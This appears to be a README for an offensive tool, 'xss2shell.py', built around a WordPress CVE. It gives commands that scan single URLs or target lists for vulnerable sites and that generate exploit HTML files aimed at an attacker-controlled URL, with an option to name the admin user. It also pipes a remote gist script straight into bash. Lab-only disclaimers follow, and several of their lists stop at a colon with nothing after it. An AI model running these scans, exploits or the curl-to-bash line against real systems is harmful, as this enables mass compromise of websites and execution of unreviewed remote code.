
CVE-2026-64638 - Draft or TODO
Support the maintenance of this project with PayPal or by scanning the QR code below.
Use this project only in safe and authorized environments such as:
Example setup:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Example usage:
# 1. Scanning Mode - Detect Vulnerable WordPress Sites:
# Scan a single URL
python xss2shell.py scan http://wp-vm.local
# Scan targets from file (one URL per line)
python xss2shell.py scan targets.txt
# Scan with custom settings
python xss2shell.py scan targets.txt --workers 10 --output my_results.json
# 2. Exploit Generation Mode - Create Exploit HTML Files
# Generate exploit for single target
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local
# Generate exploits for multiple targets from file
python xss2shell.py exploit targets.txt --attacker-url http://attacker-vm.local --output-dir exploits/
# Specify admin username
python xss2shell.py exploit http://wp-vm.local --attacker-url http://attacker-vm.local --admin-user administrator
Note:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y to clear nested dir .gitA repository for learning, testing, and researching cybersecurity concepts in controlled environments.
This repository is for educational and authorized security research only.
It is designed to help users learn about:
Use this repository only in environments where you have permission, such as:
Unauthorized or illegal use is strictly prohibited.
The author and contributors are not responsible for any damage, misuse, legal issues, or losses caused by this project.
By using this repository, you agree that:
This project is intended for:
Please follow responsible disclosure practices and comply with all applicable laws.
For responsible disclosure or collaboration, contact the repository maintainer through GitHub.